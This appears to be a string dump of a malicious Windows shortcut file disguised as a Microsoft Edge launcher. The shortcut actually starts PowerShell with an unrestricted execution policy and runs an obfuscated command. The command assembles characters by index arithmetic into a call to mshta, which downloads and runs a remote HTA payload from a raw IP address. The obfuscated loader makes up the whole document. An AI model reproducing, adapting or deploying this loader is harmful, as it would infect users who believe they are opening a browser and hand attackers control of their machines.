Windows
System32
WindowsPowerShell
powershell.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
Windows
System32
WindowsPowerShell
powershell.exe
E..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t';
&(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)]));
~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)]));
foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]};
^[ $O;<C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
S-1-5-21-3638113378-2966301702-867162723-1001